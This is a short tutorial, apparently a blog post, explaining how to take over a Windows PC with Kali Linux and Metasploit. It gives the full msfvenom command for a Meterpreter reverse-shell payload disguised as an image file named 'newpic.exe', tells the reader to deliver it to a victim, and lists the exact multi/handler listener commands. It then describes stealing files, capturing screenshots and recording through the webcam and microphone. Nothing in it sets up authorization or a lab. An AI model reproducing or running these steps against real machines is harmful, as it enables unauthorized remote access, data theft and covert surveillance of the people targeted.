How To Hack Windows PC Using Kali Linux and Metasploit
Metasploit provides you with lots of exploits and payloads that you can use to hack any windows pc. In this post, I will show you how hackers use kali Linux and Metasploit to hack windows.
Just like RATs, you can create Metasploit payloads and deliver them to your victim. Then you need to start a listener in Metasploit to accept incoming connections. When your victim opens the file you will get a connection back and you can perform all sorts of tasks remotely.
Using this method hackers steal sensitive information like account details, login email and passwords, media files, and much more like they can also execute system commands remotely and play with your system on the root level. To get more Ethical Hacking tutorials, go to below link
So let’s see how hackers do that.
Step 1- In Kali Linux, open the terminal and use this command to generate the payload.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -o newpic.exe




In this example, 192.168.43.1 is my and IP address (you need to use your IP address here) and 4444 is the port number that I want to use.
Now you will have a new payload file named newpic.exe (whatever name you used while creating payload) in the root folder.
Step 2- You need to deliver this malicious file to your victim.
Step 3- Start the listener to accept incoming connections. Open terminal, type msfconsole, and press enter to open the Metasploit tool.
There is an exploit in Metasploit used to handle reverse connections. We will use that. Enter these commands in the terminal one by one to start the listener.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.43.1
set LPORT 4444
run
It will start listening for incoming connections over port 4444.
Step 4- Everything is up, now wait for your victim to click on your payload file, and when your victim clicks and opens the file you will get a session.
And that’s how hackers hack any windows pc. After getting a session, you can perform all sorts of tasks like uploading and downloading any file from and to the victim’s system, screenshot capturing, capturing pictures using webcam, recording voice using the mic, and much more.
This is just an example of how hackers hack windows, there are lots of various methods you can use.

Post a Comment

Please do not enter any spam link in the comment box.

Previous Post Next Post